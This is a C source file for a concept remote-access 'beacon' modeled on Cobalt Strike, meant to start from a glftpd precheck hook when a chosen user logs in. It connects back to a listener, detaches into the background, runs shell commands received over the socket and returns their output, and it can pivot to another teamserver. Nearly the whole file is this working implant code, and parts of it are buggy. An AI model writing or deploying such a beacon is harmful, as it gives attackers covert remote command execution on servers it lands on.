/*	GLBEACON -- CONCEPT for a tiny glftpd beacon (FRSoldier)

	Beacon will start in precheck, if the user defined will upload files, in the glftpd enviroment.
	That user should be locked, to exec just this beacon. So create end set the user, just for this purpose.
	To test the beacon. Open a listener (on the same integer PORT), and then log in the glftpd system with
	the configured user.

	tcp client source code from this author,
	http://www.cs.tau.ac.il/~eddiea/samples/IOMultiplexing/TCP-client.c.html

	-- TODO --
	* write a good listener (team server)

	-- Know bugs/limitations --
	* listener seems to accet more than one connection, but it manages just one.

*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

/* set here the user, once called will start the beacon */
#define CSTRIKE		"liam"

/* define your listener ip address */
#define HOST	"127.0.0.1"
#define	PORT	50050

/* enable debug strings printed to screen */
//#define XDEBUG

#define TIMEOUT 3
#define MAXDATASIZE 100
#define XVER "HELLO_GLBEACON_v001d"

#define MAXSLEEP	86400
#define MAXSECLEN	4
#define MAXLEN		1024
#define XCU ">"

int	sockfj, sockfd;

uid_t myuid(void)
{
	return getuid();
}

/* GetWord */
void
getword(char *word, char *line, char stop)
{
        int x = 0, y;

        for (x = 0; ((line[x]) && (line[x] != stop)); x++)
        word[x] = line[x];

        word[x] = '\0';
        if (line[x])
                ++x;
        y = 0;

        while ((line[y++] = line[x++]));
}
/* END GetWord */

void remove_char_from_string(char c, char *str)
{
    int i=0;
    int len = strlen(str)+1;

    for(i=0; i<len; i++)
    {
        if(str[i] == c)
        {
            // Move all the char following the char "c" by one to the left.
            strncpy(&str[i],&str[i+1],len-i);
        }
    }
}

void remove_space(char *str) {
	int len = strlen(str)+1;
	if(str[len] == ' ') {
		str[len-2] = '\0';
	}
}

void xsender(int xju, char *xteam) {
	int xlen=strlen(xteam);
	if(xju) {
		if (send(sockfj, xteam, xlen, 0) == -1) {
			perror("send");
			exit (1);
		}
	} else {
		if (send(sockfd, xteam, xlen, 0) == -1) {
			perror("send");
			exit (1);
		}
	}
}

int main(int argc, char *argv[]) {

	char	userd[255];
	int	numbytes, jnumbytes;
	char	buf[MAXDATASIZE], wbuf[MAXLEN], tmpbuf[MAXLEN];
	char	bufj[MAXDATASIZE]; // used just for jumps
	struct	hostent *he, *jhe;
	struct	sockaddr_in their_addr;
	struct	sockaddr_in jump_addr;
	char 	xreply[MAXDATASIZE];
	int	xrl, x, i, XXJ, xtime;
	
	struct XARR {
		char	str[MAXLEN];
	};
	struct XARR xarr[25];

	if ((he=gethostbyname(HOST)) == NULL) {
		herror("gethostbyname");
		exit(1);
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		perror("socket");
		exit(1);
	}

	//printf("OK socket\n");

	their_addr.sin_family = AF_INET;
	their_addr.sin_port = htons(PORT);
	their_addr.sin_addr = *((struct in_addr *)he->h_addr);
	bzero(&(their_addr.sin_zero), 8);

	// retrieve glftpd user
	sprintf(userd, getenv("USER"));

	if(strcmp(CSTRIKE,userd)==0) {

		if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
			perror("connect");
			exit(1);
		}

		pid_t pid;
		pid = fork();
		if (pid < 0) {
			exit(EXIT_FAILURE);
		}

		/* If we got a good PID, then we can exit the parent process. */
		if (pid > 0) {
			exit(EXIT_SUCCESS);
		}

		// trying to register the beacon just here. Listener should register us and sends commands
		sprintf(xreply,"%s\n", XVER);
		xrl=strlen(xreply);
		if (send(sockfd, xreply, xrl, 0) == -1) {
			perror("send");
			exit (1);
		}

		XXJ=0;

		while (1) {
			xreply[0]='\0';

			// if XXJ=1 we have to listen before for sockfj

			if(XXJ) {

				if ((jnumbytes=recv(sockfj, bufj, MAXDATASIZE, 0)) == -1) {
					perror("recv");
					exit(1);
				}
				bufj[jnumbytes] = '\0';

				remove_char_from_string('\n', bufj);
				getword(wbuf,bufj,' '); // first arg

				x=0;
				while(strcmp(bufj,"\0")!=0) {
					getword(tmpbuf,bufj,' ');
					sprintf(xarr[x].str, "%s", tmpbuf);
					x++;
				}
				bufj[0]='\0';
				for(i=0; i<x; i++) {
					if(i == 0) {
						sprintf(bufj,"%s", xarr[i].str);
					} else {
						sprintf(bufj,"%s %s", buf, xarr[i].str);
					}
				}

				sprintf(buf, "%s", bufj);

#ifdef XDEBUG
				printf("NFO received string from teamserver2 bufj(%s) wbuf(%s)\n", bufj, wbuf);
#endif
			}

			// just to test. If jump mode is active, dont listen the first sock
			if(!XXJ) {

				if ((numbytes=recv(sockfd, buf, MAXDATASIZE, 0)) == -1) {
					perror("recv");
					exit(1);
				} 
				buf[numbytes] = '\0';

				if(strcmp(buf,"\0")!=0) {

#ifdef XDEBUG
					//printf("Received in pid=%d, text=: %s \n",getpid(), buf);
#endif
					// exec then the command, and reply with output
					remove_char_from_string('\n', buf);
					getword(wbuf,buf,' '); // first arg

#ifdef XDEBUG
					printf("NFO received string from teamserver1 buf(%s) wbuf(%s) XXJ(%d)\n", buf, wbuf, XXJ);
#endif

					x=0;
					while(strcmp(buf,"\0")!=0) {
						getword(tmpbuf,buf,' ');
						sprintf(xarr[x].str, "%s", tmpbuf);
						x++;
					}
					buf[0]='\0';
					for(i=0; i<x; i++) {
						if(i == 0) {
							sprintf(buf,"%s", xarr[i].str);
						} else {
							sprintf(buf,"%s %s", buf, xarr[i].str);
						}
					}
				}
			}

#ifdef XDEBUG
			printf("NFO parsing argument bufj(%s) wbuf(%s) XXJ(%d) xtime(%d)\n", bufj, wbuf, XXJ, xtime);
#endif
			if(strcmp(wbuf, "shell")==0) {
				xreply[0]='\0';
				FILE *fp;
				char path[1035];
				char eex[MAXDATASIZE];
				xreply[0]='\0';
				if(strcmp(xarr[0].str,"")==0) {
					sprintf(xreply,"WRN shell command needs one argument at the most\nshell /bin/command\n");
					xsender(XXJ, xreply);
				}

				sprintf(eex, "/bin/%s", buf); // all the arguments
				fp = popen(eex, "r");
				if (fp == NULL) {
					printf("Failed to run command\n" );
					exit(1);
				}
				while (fgets(path, sizeof(path), fp) != NULL) {
					//printf("%s", path);
					sprintf(xreply,path);
					xsender(XXJ, xreply);
				}
				pclose(fp);
			} else if (strcmp(wbuf, "ping")==0) {
				// internal command (no args)
				xreply[0]='\0';
				sprintf(xreply,"pong\n");
				xsender(XXJ, xreply);
			} else if (strcmp(wbuf, "getuser")==0) {
				// internal command (no args)
				xreply[0]='\0';
				sprintf(xreply,"%s is executing the beacon\n", userd);
				xsender(XXJ, xreply);
			} else if (strcmp(wbuf, "getuid")==0) {
				// internal command (no args)
				xreply[0]='\0';
				int gu=myuid();
				sprintf(xreply,"id %d is executing the beacon\n", gu);
				xsender(XXJ, xreply);
			} else if (strcmp(wbuf, "quit")==0) {
#ifdef XDEBUG
				printf("NFO received quit string bufj(%s) wbuf(%s)\n", bufj, wbuf);
#endif
				// internal command (no args)
				xreply[0]='\0';
				sprintf(xreply,"ok, bye.\n");
				if(XXJ) {
					xsender(XXJ, xreply);
					close(sockfj);
					XXJ=0;
					sprintf(xreply,"jump ended, you can type commands here\n");
					xsender(XXJ, xreply);
				} else {
					xsender(XXJ, xreply);
					close(sockfd);
					return 0;
				}
			} else if (strcmp(wbuf, "ver")==0) {
				// internal command (no args)
				xreply[0]='\0';
				sprintf(xreply,"%s jump(%d)\n", XVER, XXJ);
				xsender(XXJ, xreply);
			} else if (strcmp(wbuf, "jump")==0) {
				// jump host port
				if(XXJ) {
					//already in a jump
					xreply[0]='\0';
					sprintf(xreply,"already jumped to another teamserver\n");
					xsender(0, xreply);
				} else if(strcmp(xarr[0].str,"")!=0 && strcmp(xarr[1].str,"")!=0) { // host and port

					if ((jhe=gethostbyname(HOST)) == NULL) {
						herror("gethostbyname");
						exit(1);
					}
					
					if ((sockfj = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
						perror("socket");
						exit(1);
					}
					char *endptr;
					long port_num = strtol(xarr[1].str, &endptr, 10);

					if (*endptr != '\0') {
						// Errore di conversione: la stringa contiene caratteri non validi
						exit(1);
					}

					if (port_num < 0 || port_num > 65535) {
						// Errore: il numero di porta non è compreso tra 0 e 65535
						exit(1);
					}

					jump_addr.sin_family = AF_INET;
					jump_addr.sin_port = htons((uint16_t)port_num); 
					jump_addr.sin_addr = *((struct in_addr *)jhe->h_addr);
					bzero(&(jump_addr.sin_zero), 8);

					//uint16_t port = htons((uint16_t)port_num);

#ifdef XDEBUG
					printf("NFO jumping to %s:%s\n", xarr[0].str, xarr[1].str);
#endif
					if (connect(sockfj, (struct sockaddr *)&jump_addr, sizeof(struct sockaddr)) == -1) {
						perror("connect");
						exit(1);
					}
					xreply[0]='\0';
					sprintf(xreply,"jumped successfully to %s\n", xarr[0].str);
					//xrl=strlen(xreply);
					xsender(1, xreply);

					// set jump var, usefull for the main while
					wbuf[0]='\0';
					XXJ++;
				} else {
					xreply[0]='\0';
					sprintf(xreply,"WRN jump uses host and port arguments\n", buf);
					xsender(0, xreply);
				}
			} else if (strcmp(wbuf, "echo")==0) {
				if(strcmp(xarr[0].str,"")!=0) { // second arg
					xreply[0]='\0';

					sprintf(xreply,"%s %s\n", XCU, buf);
					/*
					xrl=strlen(xreply);
					if(XXJ) {
						if (send(sockfj, xreply, xrl, 0) == -1) {
							perror("send");
							exit (1);
						}
						xsender(1, xreply);
					} else {
						if (send(sockfd, xreply, xrl, 0) == -1) {
							perror("send");
							exit (1);
						}
						xsender(0, xreply);
					}
					*/
				} else {
					xreply[0]='\0';
					sprintf(xreply,"WRN echo uses at least one argument\n", buf);

					/* xrl=strlen(xreply);
					if(XXJ) {
						if (send(sockfj, xreply, xrl, 0) == -1) {
							perror("send");
							exit (1);
						}
					} else {
						if (send(sockfd, xreply, xrl, 0) == -1) {
							perror("send");
							exit (1);
						}
					}
					*/
				}

				xsender(XXJ, xreply);
			} else if (strcmp(wbuf, "help")==0) {
				// internal command (no args)
				xreply[0]='\0';
				sprintf(xreply,"available commands:\nver\tprint version\nshell\texec /bin/command argument[s]\nping\tget pong reply from beacon\nquit\tkill the beacon\nsleep N\tsleep for N seconds\ngetuser\t print user executing the beacon\necho\tprint second argument\njump\t hostname port\t(jump to another teamserver)\nhelp\tprint this help\n");
				xsender(XXJ, xreply);
			} else if (strcmp(wbuf, "sleep")==0) {
				// internal command (one arg)
				if(strcmp(xarr[1].str,"")==0) {
					xreply[0]='\0';
					sprintf(xreply,"WRN sleep command needs one argument at the most\nsleep integer (max %d seconds)\n", MAXSLEEP);
					xsender(XXJ, xreply);
				} else {
					xreply[0]='\0';
					sprintf(xreply,"sleep (converting %s to int)\n", xarr[1].str);
					xrl=strlen(xreply);
					if(XXJ) {
						// just print we are in jumping mode, and we should before exit from this
					} else {
						if (send(sockfd, xreply, xrl, 0) == -1) {
							perror("send");
							exit (1);
						}

						if(strlen(buf) > MAXSECLEN) {
							xreply[0]='\0';
							sprintf(xreply,"WRN sleep command integer must to be less than __%d bytes\n", MAXSECLEN);
							xsender(0, xreply);
						}
					
						int zzsle=0;
						zzsle=atoi(xarr[1].str); // buf, second arg
						if(zzsle > MAXSLEEP) {
							xreply[0]='\0';
							sprintf(xreply,"WRN sleep command needs one argument at the most\nsleep integer (max %s seconds)\n", MAXSLEEP);
							xsender(0, xreply);
						} else if (zzsle < 0) {
							xreply[0]='\0';
							sprintf(xreply,"WRN sleep command needs one argument at the most\nsleep integer (max %s seconds)\n", MAXSLEEP);
							xsender(0, xreply);
						} else {
							xreply[0]='\0';
							sprintf(xreply,"ok sleeping for %d seconds\n", zzsle);
							xsender(0, xreply);
							sleep(zzsle);
						}
					}

					// sleep function
					xreply[0]='\0';
					sprintf(xreply,"returned\n", buf);
					xsender(XXJ, xreply);
				}
			} else {
				xreply[0]='\0';
				sprintf(xreply,"WRN '%s' does not compute, try 'help'\n", wbuf);
				xsender(XXJ, xreply);
				wbuf[0]='\0';
			}

			// trying to delay the app, for two listen socks
			if(xtime>MAXLEN) {
#ifdef XDEBUG
				printf("NFO resetting xtime(%d)\n", xtime);
#endif
				xtime=0;
				//sleep(2);
			} else {
				xtime++;
			}
			//sleep(1);

		}
		close(sockfd);
		return 0;

	} else {
		//printf("WRN %s cannot start this beacon\n", userd);
		close(sockfd);
		return 99;
	}
}

